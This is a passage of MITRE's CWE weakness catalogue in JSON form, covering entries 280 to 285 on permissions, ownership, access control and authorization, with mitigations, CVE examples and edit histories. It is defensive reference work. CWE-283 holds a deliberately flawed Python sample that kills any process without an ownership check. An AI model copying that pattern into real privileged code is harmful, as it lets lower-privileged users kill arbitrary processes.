Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Insecure Execution-assigned Permissions","attr":{"@_Date":"2009-05-27"}}}},"280":{"attr":{"@_ID":"280","@_Name":"Improper Handling of Insufficient Permissions or Privileges","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application does not handle or incorrectly handles when it has insufficient privileges to access resources or functionality as specified by their permissions. This may cause it to follow unexpected code paths that may leave the application in an invalid state.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"755","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Other","Alter Execution Logic"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-46"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Compartmentalize the system to have \\"safe\\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.","Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges."]}},{"Phase":"Implementation","Description":"Always check to see if you have successfully accessed a resource or system functionality, and use proper error handling if it is unsuccessful. Do this even when you are operating in a highly privileged mode, because errors or environmental conditions might still cause a failure. For example, environments with highly granular permissions/privilege models, such as Windows or Linux capabilities, can cause unexpected failures."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2003-0501","Description":"Special file system allows attackers to prevent ownership/permission change of certain entries by opening the entries before calling a setuid program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0501"},{"Reference":"CVE-2004-0148","Description":"FTP server places a user in the root directory when the user\'s permissions prevent access to the their own home directory.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0148"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Fails poorly due to insufficient permissions"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":17,"Entry_Name":"Improper Filesystem Permissions"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP4","Entry_Name":"Unchecked Status Condition"}]},"Notes":{"Note":[{"#text":"CWE-280 and CWE-274 are too similar. It is likely that CWE-274 will be deprecated in the future.","attr":{"@_Type":"Maintenance"}},{"#text":"This can be both primary and resultant. When primary, it can expose a variety of weaknesses because a resource might not have the expected state, and subsequent operations might fail. It is often resultant from Unchecked Error Condition (CWE-391).","attr":{"@_Type":"Relationship"}},{"#text":"Within the context of vulnerability theory, privileges and permissions are two sides of the same coin. Privileges are associated with actors, and permissions are associated with resources. To perform access control, at some point the software makes a decision about whether the actor (and the privileges that have been assigned to that actor) is allowed to access the resource (based on the permissions that have been specified for that resource).","attr":{"@_Type":"Theoretical"}},{"#text":"This type of issue is under-studied, since researchers often concentrate on whether an object has too many permissions, instead of not enough. These weaknesses are likely to appear in environments with fine-grained models for permissions and privileges, which can include operating systems and other large-scale software packages. However, even highly simplistic permission/privilege models are likely to contain these issues if the developer has not considered the possibility of access failure.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Maintenance_Notes, Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}],"Previous_Entry_Name":{"#text":"Failure to Handle Insufficient Permissions or Privileges","attr":{"@_Date":"2009-03-10"}}}},"281":{"attr":{"@_ID":"281","@_Name":"Improper Preservation of Permissions","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not preserve permissions or incorrectly preserves permissions when copying, restoring, or sharing objects, which can cause them to have less restrictive permissions than intended.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"732","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"732","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant","Description":"This is resultant from errors that prevent the permissions from being preserved."}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Application Data","Modify Application Data"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-2323","Description":"Incorrect ACLs used when restoring backups from directories that use symbolic links.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2323"},{"Reference":"CVE-2001-1515","Description":"Automatic modification of permissions inherited from another file system.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1515"},{"Reference":"CVE-2005-1920","Description":"Permissions on backup file are created with defaults, possibly less secure than original file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1920"},{"Reference":"CVE-2001-0195","Description":"File is made world-readable when being cloned.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0195"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Permission preservation failure"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Permission Preservation Failure","attr":{"@_Date":"2009-05-27"}}}},"282":{"attr":{"@_ID":"282","@_Name":"Improper Ownership Management","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software assigns the wrong ownership, or does not properly verify the ownership, of an object or resource.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity"}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-1"},"Phase":["Architecture and Design","Operation"],"Description":"Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-1999-1125","Description":"Program runs setuid root but relies on a configuration file owned by a non-root user.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1125"}},"Affected_Resources":{"Affected_Resource":"File or Directory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Ownership errors"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"17"}},{"attr":{"@_CAPEC_ID":"35"}}]},"Notes":{"Note":{"#text":"The relationships between privileges, permissions, and actors (e.g. users and groups) need further refinement within the Research view. One complication is that these concepts apply to two different pillars, related to control of resources (CWE-664) and protection mechanism failures (CWE-693).","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Maintenance_Notes, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Affected_Resources, Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Ownership Issues","attr":{"@_Date":"2008-04-11"}}}},"283":{"attr":{"@_ID":"283","@_Name":"Unverified Ownership","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly verify that a critical resource is owned by the proper entity.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"282","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"An attacker could gain unauthorized access to system resources."}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-1"},"Phase":["Architecture and Design","Operation"],"Description":"Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software."},{"attr":{"@_Mitigation_ID":"MIT-49"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":"Consider following the principle of separation of privilege. Require multiple conditions to be met before permitting access to a system resource."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This function is part of a privileged program that takes input from users with potentially lower privileges.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Python"},"xhtml:div":{"#text":"def killProcess(processID):","xhtml:div":{"#text":"os.kill(processID, signal.SIGKILL)","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"good","@_Language":"Python"},"xhtml:div":{"#text":"def killProcess(processID):","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"user = getCurrentUser()if getProcessOwner(processID) == user:else:","xhtml:br":["","","",""],"xhtml:i":"#Check process owner against requesting user","xhtml:div":[{"#text":"os.kill(processID, signal.SIGKILL)return","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"print(\\"You cannot kill a process you don\'t own\\")return","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}}],"Body_Text":["This code does not confirm that the process to be killed is owned by the requesting user, thus allowing an attacker to kill arbitrary processes.","This function remedies the problem by checking the owner of the process before killing it:"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-0178","Description":"Program does not verify the owner of a UNIX socket that is used for sending a password.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0178"},{"Reference":"CVE-2004-2012","Description":"Owner of special device not checked, allowing root.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2012"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Unverified Ownership"}},"Notes":{"Note":{"#text":"This overlaps insufficient comparison, verification errors, permissions, and privileges.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"284":{"attr":{"@_ID":"284","@_Name":"Improper Access Control","@_Abstraction":"Pillar","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not restrict or incorrectly restricts access to a resource from an unauthorized actor.","Extended_Description":{"xhtml:p":["Access control involves the use of several protection mechanisms such as:","When any mechanism is not applied or otherwise fails, attackers can compromise the security of the software by gaining privileges, reading sensitive information, executing commands, evading detection, etc.","There are two distinct behaviors that can introduce access control weaknesses:"],"xhtml:ul":{"xhtml:li":["Authentication (proving the identity of an actor)","Authorization (ensuring that a given actor can access a resource), and","Accountability (tracking of activities that were performed)"]},"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Specification: incorrect privileges, permissions, ownership, etc. are explicitly specified for either the user or the resource (for example, setting a password file to be world-writable, or giving administrator capabilities to a guest user). This action could be performed by the program or the administrator.","Enforcement: the mechanism contains errors that prevent it from properly enforcing the specified access control requirements (e.g., allowing the user to specify their own privileges, or allowing a syntactically-incorrect ACL to produce insecure settings). This problem occurs within the program itself, in that it does not actually enforce the intended security policy that the administrator specifies."]}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Authorization","Description":"The terms \\"access control\\" and \\"authorization\\" are often used interchangeably, although many people have distinct definitions. The CWE usage of \\"access control\\" is intended as a general term for the various mechanisms that restrict which users can access which resources, and \\"authorization\\" is more narrowly defined. It is unlikely that there will be community consensus on the use of these terms."}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-1"},"Phase":["Architecture and Design","Operation"],"Description":"Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software."},{"attr":{"@_Mitigation_ID":"MIT-46"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Compartmentalize the system to have \\"safe\\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.","Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges."]}}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2010-4624","Description":"Bulletin board applies restrictions on number of images during post creation, but does not enforce this on editing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4624"}},"Affected_Resources":{"Affected_Resource":"File or Directory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Access Control List (ACL) errors"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":2,"Entry_Name":"Insufficient Authorization"},{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Missing Access Control"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"19"}},{"attr":{"@_CAPEC_ID":"441"}},{"attr":{"@_CAPEC_ID":"478"}},{"attr":{"@_CAPEC_ID":"479"}},{"attr":{"@_CAPEC_ID":"502"}},{"attr":{"@_CAPEC_ID":"503"}},{"attr":{"@_CAPEC_ID":"536"}},{"attr":{"@_CAPEC_ID":"546"}},{"attr":{"@_CAPEC_ID":"550"}},{"attr":{"@_CAPEC_ID":"551"}},{"attr":{"@_CAPEC_ID":"552"}},{"attr":{"@_CAPEC_ID":"556"}},{"attr":{"@_CAPEC_ID":"558"}},{"attr":{"@_CAPEC_ID":"562"}},{"attr":{"@_CAPEC_ID":"563"}},{"attr":{"@_CAPEC_ID":"564"}},{"attr":{"@_CAPEC_ID":"578"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 6, &#34;Determining Appropriate Access Control&#34; Page 171"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 17: Failure to Protect Stored Data.&#34; Page 253"}}]},"Notes":{"Note":{"attr":{"@_Type":"Maintenance"},"xhtml:p":"This entry needs more work. Possible sub-categories include:","xhtml:ul":{"xhtml:li":["Trusted group includes undesired entities (partially covered by CWE-286)","Group can perform undesired actions","ACL parse error does not fail closed"]}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Background_Details, Description, Maintenance_Notes, Name, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Alternate_Terms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-24","Modification_Importance":"Critical","Modification_Comment":"Changed name and description; clarified difference between \\"access control\\" and \\"authorization.\\""},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Alternate_Terms, Background_Details, Description, Maintenance_Notes, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Affected_Resources, Modes_of_Introduction, Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples"}],"Previous_Entry_Name":[{"#text":"Access Control Issues","attr":{"@_Date":"2008-09-09"}},{"#text":"Access Control (Authorization) Issues","attr":{"@_Date":"2011-03-29"}}]}},"285":{"attr":{"@_ID":"285","@_Name":"Improper Authorization","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action.","Extended_Description":{"xhtml:p":["Assuming a user with a given identity, authorization is the process of determining whether that user can access a given resource, based on the user\'s privileges and any permissions or other access-control specifications that apply to the resource.","When access control checks are not applied consistently - or not at all - users are able to access data or perform actions that they should not be allowed to perform. This can lead to a wide range of problems, including information exposures, denial of service, and arbitrary code execution."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Web Server","@_Prevalence":"Often"}},{"attr":{"@_Name":"Database Server","@_Prevalence":"Often"}}]},"Background_Details":{"Background_Detail":"An access control list (ACL) represents who/what has permissions to a given object. Different operating systems implement (ACLs) in different ways. In UNIX, there are three types of permissions: read, write, and execute. Users are divided into three classes for file access: owner, group owner, and all other users where each class has a separate set of rights. In Windows NT, there are four basic types of permissions for files: \\"No access\\", \\"Read access\\", \\"Change access\\", and \\"Full control\\". Windows NT extends the concept of three types of users in UNIX to include a list of users and groups along with their associated permissions. A user can create an object (file) and assign specified permissions to that object."},"Alternate_Terms":{"Alternate_Term":{"Term":"AuthZ","Description":"\\"AuthZ\\" is typically used as an abbreviation of \\"authorization\\" within the web application security community. It is distinct from \\"AuthN\\" (or, sometimes, \\"AuthC\\") which is an abbreviation of \\"authentication.\\" The use of \\"Auth\\" as an abbreviation is discouraged, since it could be used for either authentication or authorization."}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation","Note":{"xhtml:p":["REALIZATION: This weakness is caused during implementation of an architectural security tactic.","A developer may introduce authorization weaknesses because of a lack of understanding about the underlying technologies. For example, a developer may assume that attackers cannot modify certain inputs such as headers or cookies."]}},{"Phase":"Architecture and Design","Note":{"xhtml:p":"Authorization weaknesses may arise when a single-user application is ported to a multi-user environment."}},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":["Read Application Data","Read Files or Directories"],"Note":"An attacker could read sensitive data, either by reading the data directly from a data store that is not properly restricted, or by accessing insufficiently-protected, privileged functionality to read the 